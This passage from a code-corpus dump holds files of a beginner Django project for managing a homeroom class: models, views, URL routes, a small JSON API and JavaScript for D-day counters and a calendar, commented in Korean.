request.POST['Eval_day']\n user_input_lastday = request.POST['Eval_lastday']\n user_input_dayname = request.POST['Eval_dayname']\n\n new_Eval = Eval(\n type=user_input_type,\n day=user_input_day,\n lastday=user_input_lastday,\n dayname=user_input_dayname\n )\n new_Eval.save()\n\n return HttpResponseRedirect(reverse(\"dot:create_delete\"))\n\n\ndef Delete_EventSet(request):\n delete_id = request.GET['EventSet_id']\n\n delete_EventSet = EventSet.objects.get(id=delete_id)\n delete_EventSet.delete()\n return HttpResponseRedirect(reverse('dot:create_delete'))\n\n\ndef Delete_Eval(request):\n delete_id = request.GET['Eval_id']\n\n delete_Eval = Eval.objects.get(id=delete_id)\n delete_Eval.delete()\n return HttpResponseRedirect(reverse('dot:create_delete'))\n" }, { "alpha_fraction": 0.6865248084068298, "alphanum_fraction": 0.6971631050109863, "avg_line_length": 27.200000762939453, "blob_id": "e98a21896f88094a4112e61225b010524c86a749", "content_id": "d8d8e0db6bd64b05b1bab9c03d6bd7b602ee37bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1892, "license_type": "no_license", "max_line_length": 69, "num_lines": 50, "path": "/dot/models.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\n\nclass State(models.Model):\n state=models.CharField(max_length=255)\n\n def __str__(self):\n return self.state\n \nclass Notice(models.Model):\n content=models.CharField(max_length=255)\n\n def __str__(self):\n return self.content\n\nclass NoticeDetail(models.Model):\n detail=models.CharField(max_length=255)\n notice=models.ForeignKey(Notice, on_delete=models.CASCADE)\n\ndef image_file_rename(instance, filename):\n return '{}.jpg'.format(instance.dayname)\nclass SpecialDay(models.Model):\n dayname = models.CharField(max_length = 255,null=True)\n day = models.DateField(null=True)\n lastday = models.DateField(null=True)\n image = models.ImageField(upload_to=image_file_rename, null=True)\n\n class Meta:\n abstract = True\n\nclass EventSet(SpecialDay):\n pass\n #블록이 형성되면 반드시, 블록안에 코드가 있어야 하며,\n #코드가 안들어가는 경우, pass 코드를 입력해주면 된다.\n\nclass Eval(SpecialDay):\n type = models.CharField(max_length = 255,null=True)\n\n\n#통일한다. type 값에 Null = True 해서\n#JAVASCRIPT로 들어갈 때, type값이 null이면 event로 넣어주고,\n#null이 아니면, Eval로 넣어주는 방식으로 데이터베이스를 통일시켜주는 것도 좋다.\n#쪼갰을 때 나은 경우가 있고, 합쳤을 떄 나은 경우가 있다.\n##게시글의 제목, 내용 이랑 사용자 정보를 모델\n##상속을 이용해도 됨.\n##부모클래스를 만들어서, 둘 다 상속을 받을 수 있도록 하는 것도 좋은 방법.\n##class Meta 에서 abstract = True 로 줘서 데이터베이스에 실제 반영이 안되도록.\n##근데 자식 class에서 인스턴스를 만들면, 부모한테도 만들어져서 복잡해짐.\n##abstract는 데이터베이스를 실제로 안만드는 결과도 있지만,\n" }, { "alpha_fraction": 0.7079287767410278, "alphanum_fraction": 0.7103559970855713, "avg_line_length": 60.79999923706055, "blob_id": "d0daa25c97638e15408a74049dc1652c05039e77", "content_id": "b679550bbc905be2597b094ef117c8dab06d4dbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1236, "license_type": "no_license", "max_line_length": 102, "num_lines": 20, "path": "/dot/urls.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('calendar_next/', views.calendar_next, name=\"calendar_next\"),\n path('calendar/', views.calendar, name=\"calendar\"),\n path('create_delete/Create_State/', views.Create_State, name=\"Create_State\"),\n path('create_delete/Create_NoticeDetail/', views.Create_NoticeDetail, name=\"Create_NoticeDetail\"),\n path('create_delete/Create_Notice/', views.Create_Notice, name=\"Create_Notice\"),\n path('create_delete/Delete_NoticeDetail/', views.Delete_NoticeDetail, name=\"Delete_NoticeDetail\"),\n path('create_delete/Delete_Notice/', views.Delete_Notice, name=\"Delete_Notice\"),\n path('create_delete/Create_EventSet/', views.Create_EventSet, name=\"Create_EventSet\"),\n path('create_delete/Create_Eval/', views.Create_Eval, name=\"Create_Eval\"),\n path('create_delete/', views.create_delete, name=\"create_delete\"),\n path('create_delete/Delete_EventSet/', views.Delete_EventSet, name=\"Delete_EventSet\"),\n path('create_delete/Delete_Eval/', views.Delete_Eval, name=\"Delete_Eval\"),\n path('page1/', views.page1, name=\"page1\"),\n path('time_table/', views.time_table, name=\"time_table\"),\n path('', views.morning_assemble, name=\"morning_assemble\"),\n]\n" }, { "alpha_fraction": 0.6865671873092651, "alphanum_fraction": 0.6865671873092651, "avg_line_length": 18.14285659790039, "blob_id": "137185e8c4f0cf436c397eec347ca34a68996bee", "content_id": "feb2502bb8a3de3608bf6923ac681edfd38df432", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 36, "num_lines": 7, "path": "/api/urls.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('eventset',views.eventset),\n path('eval',views.eval),\n]\n" }, { "alpha_fraction": 0.8269230723381042, "alphanum_fraction": 0.8269230723381042, "avg_line_length": 25, "blob_id": "ec3f0aeadd3341bbaa886bf172d11824bf234d8d", "content_id": "367944a304248c5a49a6e803e6c41e575b170315", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 32, "num_lines": 2, "path": "/README.md", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "# HomeRoom_Project\nVarious Tools for Homeroom_Class\n" }, { "alpha_fraction": 0.7283950448036194, "alphanum_fraction": 0.7283950448036194, "avg_line_length": 15.199999809265137, "blob_id": "4010f0ba7b6e0a2f4e5787bfa6d48f6a799cfa56", "content_id": "a66f5395b759526d7abba728bcd8eb9a7381c4e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 81, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/dot/apps.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass DotConfig(AppConfig):\n name = 'dot'\n" }, { "alpha_fraction": 0.5269590020179749, "alphanum_fraction": 0.5312724709510803, "avg_line_length": 24.290908813476562, "blob_id": "d3d29fd52a21f496531892215d65165b8c878ba0", "content_id": "9d183c0d0c9efe6713cfb0b1bce03627717a7cdd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1397, "license_type": "no_license", "max_line_length": 72, "num_lines": 55, "path": "/api/views.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom dot.models import *\n\n#dot의 models에서\n\n# Create your views here.\n@csrf_exempt\ndef eventset(request):\n response_data = {\n 'status': 200,\n 'msg': 'success',\n 'data': []\n }\n\n if request.method == 'GET':\n EventSets = EventSet.objects.all()\n for eventset in EventSets:\n item = {\n 'id': eventset.id,\n 'dayname': eventset.dayname,\n 'day': eventset.day,\n 'lastday': eventset.lastday,\n 'image': None\n }\n response_data['data'].append(item)\n else:\n pass\n\n return JsonResponse(response_data)\n\ndef eval(request):\n response_data = {\n 'status': 200,\n 'msg': 'success',\n 'data': []\n }\n\n if request.method == 'GET':\n Evals = Eval.objects.all()\n for eval in Evals:\n item = {\n 'id': eval.id,\n 'type': eval.type,\n 'theday': eval.day,\n 'lastday': eval.lastday,\n 'dayname': eval.dayname\n }\n response_data['data'].append(item)\n else:\n pass\n\n return JsonResponse(response_data)\n" }, { "alpha_fraction": 0.5574886798858643, "alphanum_fraction": 0.6051437258720398, "avg_line_length": 27.12765884399414, "blob_id": "9db5ec7992888d6fa1a326bcf3ce75c40f5ccbd1", "content_id": "2318c413a748f47d15a33832cc0399dff0a2e42a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1568, "license_type": "no_license", "max_line_length": 88, "num_lines": 47, "path": "/@SAMPLES/js/Dday1.js", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "function Event(theday, dayname) {\n this.dayname = dayname;\n this.day = theday\n this.dday = function() {\n\n /*theday 입력형태는 2020-00-00\n 한자리수 달도 0을 붙여야 함. 2020-01-04\n */\n /*dayname : 행사명 : 문자열 */\n\n var today = new Date();\n var theveryday = new Date(this.day);\n\n var today_seconds = today.getTime();\n var theveryday_seconds = theveryday.getTime();\n /*getTime 메쏘드는\n 기준시각으로부터 입력시각까지의 1/1000초 단위로 반환*/\n\n /* 점검용 writhe 함수들\n document.write(today + '<br />');\n document.write(today_seconds + '<br />');\n document.write(theveryday + '<br />');\n document.write(theveryday_seconds + '<br />');\n\n document.write(theveryday_seconds - today_seconds + '<br />')\n document.write(Math.ceil((theveryday_seconds - today_seconds)/86400000)+'<br />');\n */\n\n return [Math.ceil((theveryday_seconds - today_seconds)/86400000), dayname];\n /*행사 일시에서 오늘 일시를 뺀 다음 하루로 나눈다(86400 * 1000 밀리초)\n 다음 Math.ceil (올림함수) 메쏘드를 이용하여 남을 일 수를 반환토록 한다\n Array의 형태로, dday 값과, 행사이름을 반환하도록.*/\n\n }\n }\n\n\n /* Example */\n /*\n var someday = new Event(\"2020-05-28\",\"아무날\")\n document.write(someday.dday());\n document.write(someday.dayname)\n\n var oneday = new Event(\"2020-06-06\",\"현충일\")\n document.write(oneday.dday());\n document.write(oneday.dayname);\n */\n" }, { "alpha_fraction": 0.5453658699989319, "alphanum_fraction": 0.5549718737602234, "avg_line_length": 36.42977523803711, "blob_id": "63b3df9d6c4d5e8ac6b6e84145169a689a940467", "content_id": "0960f5f8f44b26e43748a28d92f269c3f4f01799", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 15499, "license_type": "no_license", "max_line_length": 150, "num_lines": 356, "path": "/dot/static/dot/js/Dday2.js", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "function EventSet(theday, lastday, dayname) {\n\tthis.dayname = dayname;\n\tthis.day = theday\n\tthis.lastday = lastday\n\tthis.dday = function() {\n\n\t\t/* theday, lastday 입력형태는 2020-00-00\n\t\t한자리수 달도 0을 붙여야 함. 2020-01-04 */\n\t\t/* dayname : 행사명 : 문자열 */\n\t\t/* color : 달력에 표시할 색깔 : 문자열*/\n\t\tvar today = new Date();\n\t\t//Date 객체를 이용하여, today 변수를 정의한다\n\t\tvar today_year = today.getFullYear();\n\t\t//getFullYear()메쏘드를 미용하여 올해 년을 받아 변수로 정의한다.\n\t\tvar today_month = today.getMonth() + 1;\n\t\t//getMonth()메쏘드를 이용하여 월을 받아 변수로 정의한다.\n\t\t// 주의! getMonth()메쏘드는 월을 0 ~ 11로 반환한다.\n\t\tvar today_date = today.getDate();\n\t\t//getDate()메쏘드를 이용하여 일을 받아 변수로 정의한다.\n\n\t\tvar today_form = new Date(today_year.toString() + '-' + today_month.toString() + '-' + today_date.toString());\n\t\t//new Date()로 오늘을 정의하면, 시분초가 다나오므로 컷트해줘야함.\n\t\tvar theveryday = new Date(this.day);\n\n\t\tvar today_seconds = today_form.getTime();\n\t\tvar theveryday_seconds = theveryday.getTime() - 32400000;\n\t\t/*getTime 메쏘드는\n\t\t기준시각으로부터 입력시각까지의 1/1000초 단위로 반환*/\n\t\t/*Date Object는 기준시각을 오전 9시로 하므로, 오전 9만큼\n\t\t시간을 빼주어야 한다.*/\n\n\t\treturn Math.ceil((theveryday_seconds - today_seconds) / 86400000);\n\t\t/*행사 일시에서 오늘 일시를 뺀 다음 하루로 나눈다(86400 * 1000 밀리초)\n\t\t다음 Math.ceil (올림함수) 메쏘드를 이용하여 남을 일 수를 반환토록 한다\n\t\tArray의 형태로, dday 값과, 행사이름을 반환하도록.*/\n\t} //--dday method 종료.\n\n\tthis.write_del = function() {\n\n\t\tEvnt_cntnt_line = document.createElement(\"div\");\n\t\tEvnt_cntnt_line.setAttribute(\"class\", \"Event_cntnt_line\");\n\t\tEvnt_cntnt_line.setAttribute(\"id\", this.dayname);\n\t\t//새로운 줄 만들기\n\t\t//Event_cntnt_line class의 div 태그 생성\n\n\t\tEvnt_cntnt = document.createElement(\"div\");\n\t\tEvnt_cntnt.setAttribute(\"class\", \"Event_cntnt\");\n\t\t//Event이름칸을 만들어 준다.\n\t\t//Event_cntnt class의 div 태그 생성\n\n\t\tEvnt_cntnt_txt = document.createTextNode(this.dayname);\n\t\tEvnt_cntnt.appendChild(Evnt_cntnt_txt);\n\t\t//Event 이름칸에 내용을 채워준다.\n\t\t//Event_cntnt div에 Event_txt를 채워준다.\n\n\n\t\tEvnt_dday = document.createElement(\"div\");\n\t\tEvnt_dday.setAttribute(\"class\", \"Event_dday\");\n\t\t//Event 디데이칸을 만들어 준다.\n\t\t//Event_dday class의 div 태그 생성\n\t\tif (this.dday() > 0) {\n\t\t\t//dday의 값에 따라서, dday칸에 들어갈 내용과 색깔을 달리한다.\n\n\t\t\tif (this.dday() < 10) {\n\t\t\t\tEvnt_dday_txt = document.createTextNode(\"D-0\" + this.dday());\n\t\t\t\tEvnt_dday.appendChild(Evnt_dday_txt);\n\t\t\t\t//Event_dday 칸의 내용을 채운다. if문 활용.\n\t\t\t\t//dday가 한자리수(<10)이면 'D-0'을 붙여준다.\n\t\t\t\tif (this.dday() <= 3) {\n\t\t\t\t\tEvnt_dday.style.backgroundColor = \"#ff004d\";\n\t\t\t\t} //--dday<=3 일 때 종료\n\t\t\t\telse {\n\t\t\t\t\tEvnt_dday.style.backgroundColor = \"#00b496\";\n\t\t\t\t}\n\t\t\t} //--dday<10 일 때 종료\n\t\t\telse {\n\t\t\t\tEvnt_dday_txt = document.createTextNode(\"D-\" + this.dday());\n\t\t\t\tEvnt_dday.appendChild(Evnt_dday_txt);\n\t\t\t\t//Event_dday 칸의 내용을 채운다. if문 활용.\n\t\t\t\t//dday가 두자리수 이상(>=10)이면 'D-'을 붙여준다.\n\t\t\t\tEvnt_dday.style.backgroundColor = \"#00b496\";\n\t\t\t} //--dday>= 10 일 때 종료\n\n\t\t} //--dday>0 일 때 종료\n\t\telse if (this.dday() === 0) {\n\t\t\tEvnt_dday_txt = document.createTextNode(\"D-DAY\");\n\t\t\tEvnt_dday.appendChild(Evnt_dday_txt);\n\t\t\tEvnt_dday.style.backgroundColor = \"purple\";\n\t\t\t//dday===0일 때, dday칸을 보라색으로.\n\t\t} //--dday===0 일 때 종료\n\t\telse if (this.dday() < 0) {\n\t\t\tif (this.dday() >= -3) {\n\t\t\t\tEvnt_dday_txt = document.createTextNode(\"종료\");\n\t\t\t\tEvnt_dday.appendChild(Evnt_dday_txt);\n\t\t\t\tEvnt_dday.style.backgroundColor = \"#2e2f4a\";\n\t\t\t\t//--dday<0일 때, dday칸을 남색으로.\n\t\t\t\tEvnt_cntnt.style.color = \"gray\";\n\t\t\t}\n\n\t\t} //--dday<0 일 때 종료.\n\n\t\t//날짜를 제대로 입력하지 않은 경우.\n\t\t//의도적으로 안 적을 수도 있는 것임.(범위를 안내하거나 등)\n\t\telse {\n\t\t\tEvnt_dday.style.backgroundColor = \"white\";\n\t\t\t//배경을 white로 해주고.\n\t\t\tEvnt_dday.style.borderBottom = \"1px solid gray\";\n\t\t\t//밑줄을 검은색으로 깔아준다.\n\t\t}\n\n\t\t//조건대로 분류되어 만들어진 Evnt_cntnt와 Evnt_dday를\n\t\t//Evnt_cntnt_line에 넣은 후, Evnt_cntnt_box안에 넣어 입력 완료.\n\t\tEvnt_cntnt_line.appendChild(Evnt_cntnt);\n\t\tEvnt_cntnt_line.appendChild(Evnt_dday);\n\t\t//실제 Event_cntnt_line에 내용을 입력하는 코드이다.\n\n\t\t//Event 설정//\n\t\tEvnt_cntnt_line.addEventListener('mouseover', function() {\n\t\t\tthis.style.backgroundColor = 'navy';\n\t\t\tthis.style.color = 'white';\n\t\t})\n\n\t\tEvnt_cntnt_line.addEventListener('mouseout', function() {\n\t\t\tthis.style.backgroundColor = '#f5f5ff';\n\t\t\tthis.style.color = 'black';\n\t\t})\n\n\t\tEvnt_cntnt_line.addEventListener('click', Evnt_Pop);\n\n\t\tdocument.getElementById('Event_cntnt_box').appendChild(Evnt_cntnt_line)\n\t\t//실제 Event_cntnt_box안에 Event_cntnt_line을 입력하는 코드이다.\n\n\t\tif (this.dday() < -3) {\n\t\t\tEvnt_cntnt_line.remove();\n\t\t\tEvnt_cntnt.remove();\n\t\t\tEvnt_cntnt_txt.remove();\n\t\t\tEvnt_dday.remove();\n\t\t} // 종료된지 3일이 지나면, 태그를 없앤다.\n\n\t} //--this.write_del 종료.\n\n\n\t////////////////////////////////////////////////////////////////////////\n\t////////////////////////////////////////////////////////////////////////\n\t//////////////////////////calendar function Start///////////////////////\n\t////////////////////////////////////////////////////////////////////////\n\t////////////////////////////////////////////////////////////////////////\n\n\tthis.calendar = function() {\n\n\t\tvar StartDate = new Date(this.day);\n\t\tvar FinishDate = new Date(this.lastday);\n\t\tStartDate_Date = StartDate.getDate();\n\t\tStartDate_Month = StartDate.getMonth() + 1;\n\t\tFinishDate_Date = FinishDate.getDate();\n\t\tFinishDate_Month = FinishDate.getMonth() + 1;\n\t\t//시작일시의 일과 달을 정의한다.\n\t\t//종료일시의 일과 달을 정의한다.\n\n\t\tif (StartDate_Month !== today.getMonth() + 1) {\n\t\t\tconsole.log('over')\n\t\t} else if (StartDate.getFullYear().toString() + '-' + StartDate_Month.toString() + '-' + StartDate_Date.toString() ===\n\t\t\tFinishDate.getFullYear().toString() + '-' + FinishDate_Month.toString() + '-' + FinishDate_Date.toString()) {\n\t\t\tEvnt_target_box = document.getElementById(StartDate.getFullYear().toString() + '-' + StartDate_Month.toString() + '-' + StartDate_Date.toString());\n\n\t\t\tEvnt_calendar_line = document.createElement('div');\n\t\t\tEvnt_calendar_line.setAttribute(\"class\", \"Evnt_calendar_line\");\n\t\t\tEvnt_calendar_line.setAttribute(\"id\", this.dayname);\n\t\t\t//class 이름이 Evnt_calendar_line인 div 태그를 만든다.\n\t\t\t//id 이름은 이벤트 이름 ; this.dayname으로 지어준다.\n\t\t\tEvnt_calendar_line.addEventListener(\"click\", Evnt_Pop);\n\t\t\tEvnt_calendar_line.textContent = this.dayname;\n\t\t\t//시작일시에 들어간 칸에는 행사의 이름을 붙인다.\n\t\t\tEvnt_calendar_line.style.backgroundColor = \"rgba(0,\" + Math.round(Math.random() * 150) + \",\" + Math.round(Math.random() * 100) + \",0.35)\";\n\t\t\tEvnt_calendar_line.style.color = \"black\";\n\t\t\t//행사를 표현하는 색깔을 지정해준다.\n\n\t\t\tEvnt_target_box.appendChild(Evnt_calendar_line);\n\t\t} else {\n\t\t\tbackgroundColor = \"rgba(0,\" + Math.round(Math.random() * 150) + \",\" + Math.round(Math.random() * 100) + \",0.35)\";\n\t\t\t//Eval이 수일에 걸쳐서 진행할 경우, 배경색깔이 같아야 한다.\n\t\t\t//for문이 돌기전에 색깔을 정의해주어야 함.\n\t\t\tfor (var i = StartDate_Date; i <= FinishDate_Date; i++) {\n\t\t\t\t//시작일시의 일부터 종료일시의 일까지 반복문을 돌린다.\n\t\t\t\tEvnt_target_box = document.getElementById(StartDate.getFullYear().toString() + '-' + StartDate_Month.toString() + '-' + i.toString());\n\t\t\t\t//들어갈 일시의 div태그를 찾기위해 getElementById메쏘드를 이용하여\n\t\t\t\t//시작일시부터 종료일시까지 들어갈 일시의 div를 찾는다.\n\t\t\t\tif (i == StartDate_Date) {\n\t\t\t\t\tEvnt_calendar_line = document.createElement('div');\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"class\", \"Evnt_calendar_line\");\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"id\", this.dayname);\n\t\t\t\t\t//class 이름이 Evnt_calendar_line인 div 태그를 만든다.\n\t\t\t\t\t//id 이름은 이벤트 이름 ; this.dayname으로 지어준다.\n\t\t\t\t\tEvnt_calendar_line.addEventListener(\"click\", Evnt_Pop);\n\t\t\t\t\tEvnt_calendar_line.textContent = this.dayname;\n\t\t\t\t\t//시작일시에 들어간 칸에는 행사의 이름을 붙인다.\n\t\t\t\t\tEvnt_calendar_line.style.background = backgroundColor;\n\t\t\t\t\t//행사를 표현하는 색깔을 지정해준다.\n\t\t\t\t\tEvnt_target_box.appendChild(Evnt_calendar_line);\n\t\t\t\t\t//위에서 만든 Evnt_calendar_line을 Evnt_target_box에 넣는다.\n\t\t\t\t} else if (i == FinishDate_Date) {\n\t\t\t\t\tEvnt_calendar_line = document.createElement('div');\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"class\", \"Evnt_calendar_line\");\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"id\", this.dayname);\n\n\t\t\t\t\tEvnt_calendar_line.addEventListener(\"click\", Evnt_Pop);\n\t\t\t\t\tEvnt_calendar_line.textContent = this.dayname + '종료';\n\t\t\t\t\t//종료일시에 들어간 칸에는 행사의 이름과 '종료'를 붙인다.\n\t\t\t\t\tEvnt_calendar_line.style.background = backgroundColor;\n\t\t\t\t\tEvnt_target_box.appendChild(Evnt_calendar_line);\n\t\t\t\t} else {\n\t\t\t\t\tEvnt_calendar_line = document.createElement('div');\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"class\", \"Evnt_calendar_line\");\n\t\t\t\t\tEvnt_calendar_line.setAttribute(\"id\", this.dayname);\n\t\t\t\t\t//class 이름이 이벤트 이름인 div 태그를 만든다.\n\t\t\t\t\tEvnt_calendar_line.addEventListener(\"click\", Evnt_Pop);\n\t\t\t\t\tEvnt_calendar_line.innerText = ' ';\n\t\t\t\t\tEvnt_calendar_line.style.background = backgroundColor;\n\t\t\t\t\tEvnt_target_box.appendChild(Evnt_calendar_line);\n\t\t\t\t} //else 종료\n\t\t\t} //for문 종료\n\t\t} //else 종료\n\n\t} // calendar function 종료\n\n\n\n\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//Evnt_Pop function : 캘린더에서 해당 행사를 클릭하면, 클래스 이름에 'on'을 붙인다.\n\t//다시누르면 'on'이 빠진다.\n\t//'on'이 붙어있을 때에는, div태그를 형성하여, 관련 정보를 열람할 수 있도록 한다.\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\t//////////////////////////////////////////////////////////////////////\n\n\n\n\tEvnt_Pop = function() {\n\t\tif (this.classList == 'Evnt_calendar_line' || this.classList == 'Event_cntnt_line') {\n\t\t\tvar Evnt_popup_id = this.getAttribute('id')\n\t\t\tconsole.log(Evnt_popup_id);\n\t\t\t//id를 getAttribute 하는 이유는 동일 이름의 image를 땡겨오기 위함이다.\n\t\t\t//image를 땡겨오기위해서는 models.py를 절실히 배워야한다.\n\t\t\tthis.classList.add('on');\n\t\t\t//여기에서의 this는 해당 DOM을 의미한다.\n\t\t\tEvnt_popup = document.createElement('div');\n\t\t\tEvnt_popup.setAttribute('class', 'Evnt_popup');\n\t\t\t// Evnt_popup.innerHTML = 'Choco Hyme'\n\t\t\tthis.appendChild(Evnt_popup);\n\n\t\t\tEvnt_popup_cntnt = document.createElement('div');\n\t\t\tEvnt_popup_cntnt.setAttribute('class', 'Evnt_popup_cntnt');\n\t\t\t// Evnt_popup_cntnt.innerHTML = Evnt_popup_id\n\t\t\tEvnt_popup.appendChild(Evnt_popup_cntnt);\n\n\t\t\tEvnt_popup_cntnt_image = document.createElement('img');\n\t\t\tEvnt_popup_cntnt_image.setAttribute('class', 'Evnt_popup_cntnt_image');\n\t\t\t// Evnt_popup_id_by_model = {{EventSets.get(dayname=Evnt_popup_id).url}}\n\t\t\t// Evnt_popup_cntnt_image.src = '{{EventSets.get(dayname=\"'+Evnt_popup_id+'\").image.url}}'\n\t\t\tEvnt_popup_cntnt_image.src = '../media/' + Evnt_popup_id + '.jpg';\n\t\t\tEvnt_popup_cntnt_image.alt = '사진없음'\n\t\t\tEvnt_popup_cntnt.appendChild(Evnt_popup_cntnt_image);\n\t\t} else if (this.classList == 'Evnt_calendar_line on' || this.classList == 'Event_cntnt_line on') {\n\t\t\tthis.classList.remove('on');\n\t\t\tEvnt_popup.remove();\n\t\t}\n\t}\n}\n\n//어떤 이벤트 창이 열려있는데 다른 이벤트창이 또 열림.\n\n// ------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n// -------------------------------------------------------------------------\n\n// AJAX를 통하여 XMLRequest를 보내보도록 하자.\nlet Events = new Array();\n\nfunction LoadEventSet() {\n\tlet url = '/api/eventset';\n\tvar req = new XMLHttpRequest();\n\treq.open('GET', url);\n\treq.onreadystatechange = function() {\n\t\tif (this.readyState == 4 && this.status == 200) {\n\t\t\tvar jsonResponse = JSON.parse(req.responseText);\n\t\t\tvar data = jsonResponse['data']\n\n\t\t\tfor (let i = 0; i < data.length; i++) {\n\t\t\t\t//TODO: EventSet 객체들을 만들어 Array에 넣는다.\n\t\t\t\tconsole.log(data[i][\"day\"], data[i][\"lastday\"], data[i][\"dayname\"])\n\t\t\t\tlet eventset = new EventSet(\n\t\t\t\t\tdata[i][\"day\"],\n\t\t\t\t\tdata[i][\"lastday\"],\n\t\t\t\t\tdata[i][\"dayname\"],\n\t\t\t\t);\n\n\t\t\t\tEvents.push(eventset)\n\t\t\t\t// console.log(Events)\n\t\t\t}\n\n\t\t\tEvents.sort(function(a, b) {\n\t\t\t\tvar former = new Date(a.day);\n\t\t\t\tvar latter = new Date(b.day);\n\t\t\t\treturn former.getTime() - latter.getTime();\n\t\t\t});\n\n\t\t\t//아래 sort 함수는 기간이 2일 이상인 eval들을 기준으로,\n\t\t\t//기간이 긴 eval 부터 윗라인에 채워지도록 한 sort function 이다.\n\t\t\tEvents.sort(function(a, b) {\n\t\t\t\tvar former_firstday = new Date(a.day);\n\t\t\t\tvar former_lastday = new Date(a.lastday);\n\t\t\t\tvar former_period = former_lastday.getTime() - former_firstday.getTime();\n\n\t\t\t\tvar latter_firstday = new Date(b.day);\n\t\t\t\tvar latter_lastday = new Date(b.lastday);\n\t\t\t\tvar latter_period = latter_lastday.getTime() - latter_firstday.getTime();\n\n\t\t\t\treturn latter_period - former_period;\n\t\t\t});\n\n console.log(Events)\n\t\t\tif (document.getElementById(\"Event_cntnt_box\") !== null) {\n\t\t\t\tfor (i = 0; i < Events.length; i++) {\n\t\t\t\t\tEvents[i].write_del();\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tfor (i = 0; i < Events.length; i++) {\n\t\t\t\t\tEvents[i].calendar();\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treq.send();\n}\n\nLoadEventSet();\n\n//아래 sort 함수는 시작 시작이 빠른 eval이 먼저 오도록 하는 function이다.\n\n/////////////////////////////////////////////////////////////////////\n/////////////////////////////////////////////////////////////////////\n//////////////////////변수들 Sorting ////////////////////////////////\n/////////////////////////////////////////////////////////////////////\n/////////////////////////////////////////////////////////////////////\n" }, { "alpha_fraction": 0.6748992204666138, "alphanum_fraction": 0.6849798560142517, "avg_line_length": 30, "blob_id": "a4440be5e243968b00c77013f78a341e7a3aa752", "content_id": "24c2a723e9e14f15c2a1a78ff9e6b6e07bbd52f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2734, "license_type": "no_license", "max_line_length": 59, "num_lines": 64, "path": "/dot/static/dot/js/Date.js", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "//날짜와 요일 입력\nvar today = new Date();\n //Date 객체를 이용하여, today 변수를 정의한다\nvar today_year = today.getFullYear();\n //getFullYear()메쏘드를 미용하여 올해 년을 받아 변수로 정의한다.\nvar today_date = today.getDate();\n //getDate()메쏘드를 이용하여 일을 받아 변수로 정의한다.\nvar today_month = today.getMonth()+1;\n //getMonth()메쏘드를 이용하여 월을 받아 변수로 정의한다.\n // 주의! getMonth()메쏘드는 월을 0 ~ 11로 반환한다.\nvar next_month = today.getMonth()+2;\n\nvar today_day = today.getDay();\n\n//getDay()메쏘드를 이용하여 요일을 숫자형으로 받아 변수 정의\n//0(일요일) ~ 6(토)\n//일요일은 값이 0이므로 1을 뺴주게 되면, undefined이다.\n//그러므로, 조건문을 통해 일요일로 재정의한다.\n\nvar week = ['일','월','화','수','목','금','토',];\nvar weekEng = ['sun','mon','tue','wed','thu','fri','sat',];\n\n//week_numb 를 정의해서, 이전 week_numb의 6번(일요일) innerHtml이\n//내용이 차있으면, week_numb를 높인다.\n\nvar ThisFirst = new Date(today_year, today_month-1, 1);\n//이번달 첫째 날을 ThisFirsh로 지정한다.\nvar ThisLast = new Date(today_year, today_month, 0);\n//이번달 마지막 날을 ThisLast로 지정한다.\n\nvar PrevFirst = new Date(today_year, today_month-2,1);\n//저번달 첫째 날을 PrevFirst로 지정한다.\nvar PrevLast = new Date(today_year, today_month-1,0);\n//저번달 마지막 날을 PrevFirst로 지정한다.\n\nvar NextFirst = new Date(today_year, today_month,1);\n//저번달 첫째 날을 PrevFirst로 지정한다.\nvar NextLast = new Date(today_year, today_month+1,0);\n//저번달 마지막 날을 PrevFirst로 지정한다.\n\n\nvar TFDate = 